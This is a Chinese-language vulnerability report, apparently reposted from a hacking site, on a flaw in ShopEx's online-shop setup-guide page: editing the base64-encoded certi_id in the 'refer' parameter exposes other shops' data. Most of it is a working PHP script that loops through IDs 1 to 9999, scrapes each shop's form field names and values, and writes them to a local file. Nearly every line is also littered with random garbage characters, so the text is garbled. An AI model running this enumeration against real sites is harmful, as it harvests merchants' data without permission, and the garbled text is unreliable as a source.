|
|
简要描述:
3 v+ v0 h2 p4 A2 B& L2 f2 oShopEx某接口缺陷,可遍历所有网站
/ {0 l7 U4 ?6 E/ n* i! W2 T" l. Q详细说明:8 {% V' X) ~8 O" l8 O$ t- _
问题出现在shopex 网店使用向导页面
! K \! n; P+ Z, B2 g: W5 f8 E. a- D* J& C
- P7 l. O0 A$ q) M7 @' U( o: P; ^+ O- \
# x+ K0 p1 K V s+ ^http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
. t" U* T% G2 i; B" ~
1 a) h `: @/ y' X/ x. a# d C: J# {, P+ t4 p
. o) @, Y4 W. x# R D( k" rrefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
7 Z* @ r% K; A+ [7 |1 P+ I. ^( h# E7 B
7 ]& W m' F6 |3 g; s3 \' G& R, T
! r7 w2 V1 u( Z H9 N4 o我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
# E- O* }. l! b" \: ?; F8 z% n8 {( v+ n
# Z( ]5 f) R3 U' p$ G. }. Q
4 s1 \" I0 B5 m, g& f2 E/ k3 K* H<?php
) K! t4 M9 H& L
% F* T/ o( Y7 u for ($i=1; $i < 10000; $i++) { //遍历9 K1 `6 i% G- l9 l2 }1 D! L6 `
5 A$ t- w" H" q, g
ShowshopExD($i);+ ^& D/ |1 {: K- \3 @6 X8 i4 g& I
3 r; H% t' p0 L* n/ {2 j }
* E* I$ h& q; D- `, O% ~8 i$ X) ]! s* E9 a" L
function ShowshopExD($cid) {
% l% C" i+ j V
" V- e* @! ]% I" N' M" m- @ $url='http://guide.ecos.shopex.cn/step2.php';
( K7 W9 U7 q. C8 O. b/ C% T# z8 z$ J" _/ R
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
1 G. `2 K! ~2 M! B! u2 ?* C2 e- ]0 D( n' C' `+ }/ h5 P
$url = $url.'?refer='.$refer;
Z! y5 z# _1 m4 V3 `, d* T$ X, k' U9 k7 u7 W
$ch = curl_init($url);
1 ]2 }) B: w4 \) j5 d$ \2 S* W. Y6 Y- l0 o' m% t+ j. @
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;4 C7 R* \5 E# ]
# k# I+ x% C: D8 v& q8 R* v curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;1 C z3 g8 Z$ J- p
% \% q: N1 k7 i% v1 _# k. h5 ?% s $result = curl_exec($ch);
' r) C5 C4 S. p# A' c
) n+ z. ~0 V) V8 K7 ?3 n $result = mb_convert_encoding($result, "gb2312", "UTF-8");4 ~0 [2 P+ ~" M! U9 V
5 z( d5 {2 Y0 v' o
if(strpos($result,$refer))) u/ V7 w J8 Z' \
/ O! `. x/ O& \8 M7 v6 ^, z! T
{
9 j( y0 D) R' A! B x
0 Z! p/ X4 ^2 l6 L$ ^: Z4 _ $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
" h! B8 X) r* X1 Q
+ K: X& X) b/ ~2 j preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);7 B6 f4 Z, m+ I1 H: T% F- e6 t
4 I* c5 ^" E& }0 \( n foreach ($value[1] as $key) {! q8 a9 h; ^% n3 P* F
X; x& I2 j$ T preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
% k C# c! r6 \% ]4 c! W: d: Y
9 q8 H# I: s. ?. `; m2 q; | echo $res[1][0].':'.$res[3][0]."\r\n";% _* m4 q5 e% v( f+ J
3 |8 [. N" i3 t1 k" B $col =$res[1][0].':'.$res[3][0]."\r\n";
9 F( {0 F6 o$ u5 ^+ A c% h. T A+ S5 e. q3 ?+ t
fwrite($fp, $col, strlen($col));
$ d- @0 c3 P' M- k5 z
9 W' L" b" M; T/ I6 v+ p }
0 z9 Y( d1 o6 e. H* H1 y5 R9 y7 O
3 \8 b5 U( J8 I echo '--------------------------------'."\r\n";
: K- [, F4 j( [, w
( F) l1 M+ V. h1 m& l( k* R g fclose($fp);
) w+ X$ l: P* z4 j% r4 v
2 D! U* l X( n3 h }
1 {" a, e2 i6 Y$ J4 E! B# y; Y
! c( v1 t! w* ]0 A& d+ {1 G8 l flush();2 N' P! g( a8 a- M$ J6 u/ k
! Q' Z3 D6 N6 F# |* V. H; c- X curl_close($ch);) \) j; t: C1 i% b( n+ v; {
5 c# q* B( u! Z- F: k }. L6 R, y; U/ a* z- z( e
" o% o1 m/ P6 f1 W. T7 R3 ~4 z?>! Q( A" g# B; n# v% W3 H$ |) @
漏洞证明:. v6 m/ }4 M9 p7 K: F2 n
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg/ s/ E4 S+ U3 Q
refer换成其他加密方式
3 _3 M, r0 c1 J( \3 y0 \ |
|